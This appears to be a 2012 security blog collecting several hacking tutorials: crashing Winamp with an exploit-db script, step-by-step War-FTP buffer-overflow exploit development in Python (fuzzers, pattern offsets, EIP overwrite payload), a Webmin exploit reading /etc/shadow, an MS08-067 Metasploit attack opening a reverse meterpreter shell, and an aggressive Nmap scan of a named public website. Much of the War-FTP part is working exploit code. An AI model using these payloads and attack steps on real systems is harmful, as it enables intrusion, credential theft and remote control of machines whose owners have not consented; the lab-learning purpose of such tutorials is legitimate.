Friday, September 28, 2012

Local Buffer Overflow : Winamp v5.572

In this post I try to make Winamp 5.572, running on Windows XP SP3, crash. First, I will create a music file to be played by Winamp. To make this file, I search exploit-db.

I chose /windows/dos/12494.pl

root@bt:~# cp /pentest/exploits/exploitdb/platforms//windows/dos/12494.pl /root
root@bt:~# mv 12494.pl wincrash.pl

Change line 1 to this:

#!/usr/bin/perl

Then execute the file:

root@bt:~# perl wincrash.pl


This produces a file named X.swf.

Send it to the Windows XP machine, play it in Winamp, and see what happens.

The crash, when viewed with OllyDbg:

Thanks...^_^

Wednesday, September 19, 2012

Software Exploitation Part 1

In this tutorial, I will try to explain the basics of software exploitation. As an example, I will use a simple application that runs on Windows, called War-FTP. War-FTP is an FTP server for Windows, and it has no protection against buffer overflows (non-SEH). OK, so what is a buffer overflow, and what is SEH?



Buffer Overflow

A buffer overflow happens when an application receives a bigger chunk of data than it expects, so the data does not fit into the allocated storage space, or buffer. Buffer overflow errors are so common because programmers make mistakes: they fail to foresee that unexpected data values may be entered, and they fail to carry out bounds checking to ensure that any data a user enters falls within the expected range.


SEH

An exception is an event that occurs during the execution of a program and requires the execution of code outside the normal flow of control. Structured exception handling (SEH) is a mechanism for handling both hardware and software exceptions. When a SEH exception occurs, you typically see a window that offers to send an error report to Microsoft.


Let's begin!

Host        : Backtrack 5 R2 (IP address 192.168.1.1)

Target      : Microsoft Windows XP SP3 (IP address 192.168.1.101)

Target apps : War-FTP on Windows XP (port 21)

Information gathering

From Nessus:

Description from Nessus (selected as shown in the figure above):

The version of War FTP Daemon running on this host contains a buffer overflow in the code that handles the USER and PASS commands. A potential intruder could use this vulnerability to crash the server as well as run arbitrary commands on the system.

After this, we can fuzz the service with a simple fuzzer. We will send 1000 bytes of 'A' to the War-FTP application with this fuzzer.

#!/usr/bin/python
# file : myfuzzer.py
# Sends a 1000-byte USER argument to War-FTP. Bytes literals are used so the
# script runs unchanged on Python 2.6+ and Python 3.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = b"\x41" * 1000                 # 1000 x 'A'
s.connect(('192.168.1.101', 21))
data = s.recv(1024)                   # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)                   # response to USER
s.send(b'PASS PASSWORD \r\n')
s.close()
print("Finish")


We run the fuzzer as follows:

Wow... the War-FTP application closed immediately. In this case, War-FTP crashed because of the fuzzer.

After this, War-FTP will not start any more. Therefore, we have to delete FtpDaemon.dat in our War-FTP folder.

Debugger

Now we want to know what happens in the memory of War-FTP. For this, we will use a debugger on Windows XP, OllyDbg.
Run War-FTP under OllyDbg, and then we will fuzz again.

OK, now we will find out after how many bytes the EIP register gets overwritten. We will use two little programs, pattern_create.rb and pattern_offset.rb. They are located in /opt/metasploit/apps/pro/msf3/tools/


root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb > string_pattern.txt 

We will use the pattern in string_pattern.txt as the data when we fuzz.


#!/usr/bin/python
# Sends the 1000-byte cyclic pattern from pattern_create.rb instead of 'A's,
# so the value that ends up in EIP tells us the offset.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# The pattern is split over several lines; Python joins adjacent literals.
buff = (b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8A"
        b"b9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0"
        b"Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3"
        b"Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5"
        b"Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8"
        b"Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9"
        b"An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0"
        b"Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1"
        b"Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3"
        b"At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4"
        b"Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4"
        b"Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5"
        b"Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6"
        b"Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8"
        b"Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1"
        b"Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B")
s.connect(('192.168.1.101', 21))
data = s.recv(1024)                   # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD \r\n')
s.close()
print("Finish")


Fuzz again! Then you will see the following in War-FTP:

Now we will calculate the offset of these bytes within the pattern generated by pattern_create.rb. For this we use pattern_offset.rb:

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb q4Aq5Aq
493
root@bt:/opt/metasploit/apps/pro/msf3/tools#


Note:
32714131 is the value found in EIP at the crash

q4Aq5Aq is the data that ESP points to


OK, we will modify our fuzzer as follows:

#!/usr/bin/python
# 485 filler bytes, then a marker value that should land in EIP.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = b"\x90" * 485                  # NOPs up to the EIP offset
buff += b"\xEF\xBE\xAD\xDE"           # 0xDEADBEEF, little-endian; expected in EIP

s.connect(('192.168.1.101', 21))
data = s.recv(1024)                   # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD \r\n')
s.close()
print("Finish")



Fuzz again...

OK, we will modify our fuzzer again as follows:


#!/usr/bin/python
# Full 1000-byte layout: NOPs up to EIP, the EIP marker, NOPs up to ESP,
# then INT3 (0xCC) filler so the debugger stops as soon as it is reached.
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buff = b"\x90" * 485                  # NOPs up to the EIP offset
buff += b"\xEF\xBE\xAD\xDE"           # marker expected in EIP
buff += b"\x90" * (493 - len(buff))   # pad up to the ESP offset
buff += b"\xCC" * (1000 - len(buff))  # INT3 filler (the original "\xC" is an invalid escape; \xCC is intended)

s.connect(('192.168.1.101', 21))
data = s.recv(1024)                   # read the FTP banner
print("Sending evil data via USER command...")
s.send(b'USER ' + buff + b'\r\n')
data = s.recv(1024)
s.send(b'PASS PASSWORD \r\n')
s.close()
print("Finish")
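As an added example that is not part of the original post, the following Python re-implements the logic of pattern_create.rb and pattern_offset.rb and the buffer layout of the fuzzer above, so the offsets 485 and 493 reported by pattern_offset.rb can be checked without Metasploit. The function names are my own, and the filler byte is read as 0xCC (an assumption).

```python
import string
import struct


def pattern_create(length):
    """Same triplet sequence as pattern_create.rb: Aa0Aa1...Az9Ba0..."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def register_to_pattern(hex_value):
    """Bytes a 32-bit register was loaded from. x86 is little-endian, so
    EIP = 0x32714131 came from the bytes 31 41 71 32, i.e. the ASCII "1Aq2"."""
    return struct.pack("<I", int(hex_value, 16)).decode("ascii")


def pattern_offset(pattern, needle):
    """Offset of needle in the pattern (-1 if absent), like pattern_offset.rb."""
    return pattern.find(needle)


def build_buffer(eip_offset, esp_offset, total=1000, ret=b"\xEF\xBE\xAD\xDE"):
    """Layout of the post's last fuzzer: NOP sled up to EIP, 4-byte return
    address, NOP padding up to ESP, then INT3 (0xCC) filler to the end
    (the post writes that filler as "\\xC"; 0xCC is assumed here)."""
    buf = b"\x90" * eip_offset + ret
    buf += b"\x90" * (esp_offset - len(buf))
    buf += b"\xCC" * (total - len(buf))
    return buf


if __name__ == "__main__":
    pat = pattern_create(1000)  # same 1000-byte pattern as in the post
    eip = pattern_offset(pat, register_to_pattern("32714131"))
    esp = pattern_offset(pat, "q4Aq5Aq")
    print("EIP offset:", eip, "ESP offset:", esp)  # 485 and 493
    layout = build_buffer(eip, esp)
    print(layout[485:489], layout[493:497])
```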

Continued on software exploitation part 2

Friday, September 14, 2012

Basics privilege escalation attack

Hey guys!!
In this tutorial, I will show you a simple privilege escalation attack in our lab. I assume that pwnOS is installed in VirtualBox as the target.
From the terminal, we can scan the target OS (IP address 192.168.1.101):

From the above, we can see that several ports are open, such as port 22 (ssh), port 80 (http), etc.

After that, we can see the detail about a target with Nessus.

OK, port 10000 (webmin) is open, so now we will look in exploit-db for an exploit for this service.

We will try to exploit it with /multiple/remote/2017.pl

Just run this file in the terminal.

It displays help on how to use this file.

OK, let's try! We want to read /etc/shadow on the target.

OK, as we can see from that figure, the target has the users vmware, obama, osama and yomama.

Thank you! :-)

Monday, September 10, 2012

Hacking smb on Microsoft Windows XP SP3 using Metasploit

First, we scan the ports of the target host (192.168.1.101) using Nmap.

From the above we know that 3 ports are open by default on Microsoft Windows XP SP3. We want to break into the system (target OS) using Metasploit on Backtrack 5 R2.
Now we run msfconsole:
1. Application > Backtrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

OK, now we can look for weaknesses in the smb service. Just type:

msf > search smb

From the list, we want to use ms08_067_netapi; we can get more information about that weakness with the info command.

To use it in Metasploit, just type:

msf > use exploit/windows/smb/ms08_067_netapi

After that, we can see and select the payload that will be used.

We will use windows/meterpreter/reverse_tcp. Then we must set several parameters: set PAYLOAD, set RHOST, set LHOST and set LPORT.

To check that all parameters are correct, we can type the show options command.


Now we are going to launch the exploit. Just type exploit.

Now, from meterpreter, we can type shell to get a command shell on Windows XP.

Congratulations...! :)

Friday, September 7, 2012

Basics information gathering using Nmap

Hi, I will show you how to use Nmap by scanning http://www.is2c-dojo.com. As we know, Nmap is an application used to perform port scanning. In Backtrack you can run nmap from the terminal or from the GUI (zenmap). We will try to find out what services are running on this website, so make sure you are connected to the internet. OK, in Backtrack, open a terminal and type the following command:

root@bt:~# nmap -v -A www.is2c-dojo.com  <press enter>

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-09-08 04:58 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Ping Scan at 04:58
Scanning www.is2c-dojo.com (108.162.199.80) [4 ports]
Completed Ping Scan at 04:58, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:58
Completed Parallel DNS resolution of 1 host. at 04:58, 0.42s elapsed
Initiating SYN Stealth Scan at 04:58
Scanning www.is2c-dojo.com (108.162.199.80) [1000 ports]
Discovered open port 80/tcp on 108.162.199.80
Discovered open port 8080/tcp on 108.162.199.80
SYN Stealth Scan Timing: About 44.30% done; ETC: 04:59 (0:00:39 remaining)
Increasing send delay for 108.162.199.80 from 0 to 5 due to 11 out of 18 dropped probes since last increase.
Increasing send delay for 108.162.199.80 from 5 to 10 due to 11 out of 13 dropped probes since last increase.
Completed SYN Stealth Scan at 04:59, 77.32s elapsed (1000 total ports)
Initiating Service scan at 04:59
Scanning 2 services on www.is2c-dojo.com (108.162.199.80)
Completed Service scan at 04:59, 5.00s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against www.is2c-dojo.com (108.162.199.80)
Retrying OS detection (try #2) against www.is2c-dojo.com (108.162.199.80)
NSE: Script scanning 108.162.199.80.
Initiating NSE at 04:59
Completed NSE at 05:01, 84.00s elapsed
Nmap scan report for www.is2c-dojo.com (108.162.199.80)
Host is up (0.091s latency).
Other addresses for www.is2c-dojo.com (not scanned): 108.162.199.180
Not shown: 997 filtered ports
PORT     STATE  SERVICE     VERSION
80/tcp   open   http?
| http-robots.txt: 1 disallowed entry
|_/
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-methods: No Allow or Public header in OPTIONS response (status code 301)
| http-title: IS2C | Information Security Shinobi Camp
|_Requested resource was http://is2c-dojo.com/
443/tcp  closed https
8080/tcp open   http-proxy?
Aggressive OS guesses: Check Point ZoneAlarm Z100G firewall (97%), Linux 2.6.36 (97%), Check Point UTM-1 Edge X firewall (97%), DD-WRT v23 (Linux 2.4.34) (97%), Linux 2.6.23 (97%), Linux 2.6.32 (97%), Sun Solaris 10 (97%), Sun Solaris 10 (SPARC) (97%), Actiontec GT701 DSL modem (96%), Linux 2.6.31 (96%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 2.906 days (since Wed Sep  5 07:16:01 2012)
TCP Sequence Prediction: Difficulty=206 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT      ADDRESS
1   90.56 ms 108.162.199.80

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 174.81 seconds
           Raw packets sent: 2140 (99.110KB) | Rcvd: 24 (1.266KB)

After the scan is done, we can see that this website has the following information:
  • The site has the IP address 108.162.199.80
  • Ports 80 and 8080 (http) are open
  • Port 443 (https) is closed
  • The web server most likely runs Linux or Sun Solaris
OK, from the following line of the output:

No exact OS matches for host (test conditions non-ideal)

we know that Nmap is still not able to identify the exact OS of www.is2c-dojo.com.

OK, thank you and see you soon.

by scx020c07d :)